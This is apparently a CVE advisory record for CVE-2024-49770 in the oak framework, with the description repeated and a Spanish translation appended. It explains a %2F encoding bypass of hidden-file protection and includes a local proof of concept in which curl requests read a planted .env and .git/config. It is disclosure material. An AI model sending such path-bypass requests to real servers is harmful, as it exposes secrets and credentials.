CVE-2024-49770

`oak` is a middleware framework for Deno's native HTTP server, Deno Deploy, Node.js 16.5 and later, Cloudflare Workers and Bun. By default `oak` does not allow transferring of hidden files with `Context.send` API. However, prior to version 17.1.3, this can be bypassed by encoding `/` as its URL encoded form `%2F`. For an attacker this has potential to read sensitive user data or to gain access to server secrets. Version 17.1.3 fixes the issue.

`oak` is a middleware framework for Deno's native HTTP server, Deno Deploy, Node.js 16.5 and later, Cloudflare Workers and Bun. By default `oak` does not allow transferring of hidden files with `Context.send` API. However, prior to version 17.1.3, this can be bypassed by encoding `/` as its URL encoded form `%2F`. For an attacker this has potential to read sensitive user data or to gain access to server secrets. Version 17.1.3 fixes the issue.

### Summary By default `oak` does not allow transferring of hidden files with `Context.send` API. However, this can be bypassed by encoding `/` as its URL encoded form `%2F`. ### Details 1.) Oak uses [decodeComponent](https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L182C10-L182C25) which seems to be unexpected. This is also the reason why it is not possible to access a file that contains URL encoded characters unless the client URL encodes it first. 2.) The function [isHidden](https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L117-L125) is flawed since it only checks if the first subpath is hidden, allowing secrets to be read from `subdir/.env`. ### PoC ```ts // server.ts import { Application } from "jsr:@oak/oak@17.1.2"; const app = new Application(); app.use(async (context, next) => { try { await context.send({ root: './root', hidden: false, // default }); } catch { await next(); } }); await app.listen({ port: 8000 }); ``` In terminal: ```bash # setup root directory mkdir root/.git echo SECRET_KEY=oops > root/.env echo oops > root/.git/config # start server deno run -A server.ts # in another terminal curl -D- http://127.0.0.1:8000/poc%2f../.env curl -D- http://127.0.0.1:8000/poc%2f../.git/config ``` ### Impact For an attacker this has potential to read sensitive user data or to gain access to server secrets.

### Summary By default `oak` does not allow transferring of hidden files with `Context.send` API. However, this can be bypassed by encoding `/` as its URL encoded form `%2F`. ### Details 1.) Oak uses [decodeComponent](https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L182C10-L182C25) which seems to be unexpected. This is also the reason why it is not possible to access a file that contains URL encoded characters unless the client URL encodes it first. 2.) The function [isHidden](https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L117-L125) is flawed since it only checks if the first subpath is hidden, allowing secrets to be read from `subdir/.env`. ### PoC ```ts // server.ts import { Application } from "jsr:@oak/oak@17.1.2"; const app = new Application(); app.use(async (context, next) => { try { await context.send({ root: './root', hidden: false, // default }); } catch { await next(); } }); await app.listen({ port: 8000 }); ``` In terminal: ```bash # setup root directory mkdir root/.git echo SECRET_KEY=oops > root/.env echo oops > root/.git/config # start server deno run -A server.ts # in another terminal curl -D- http://127.0.0.1:8000/poc%2f../.env curl -D- http://127.0.0.1:8000/poc%2f../.git/config ``` ### Impact For an attacker this has potential to read sensitive user data or to gain access to server secrets.

`oak` es un framework de middleware para el servidor HTTP nativo de Deno, Deno Deploy, Node.js 16.5 y posteriores, Cloudflare Workers y Bun. De forma predeterminada, `oak` no permite la transferencia de archivos ocultos con la API `Context.send`. Sin embargo, antes de la versión 17.1.3, esto se puede omitir codificando `/` como su forma codificada de URL `%2F`. Para un atacante, esto tiene el potencial de leer datos confidenciales del usuario o de obtener acceso a secretos del servidor. La versión 17.1.3 soluciona el problema.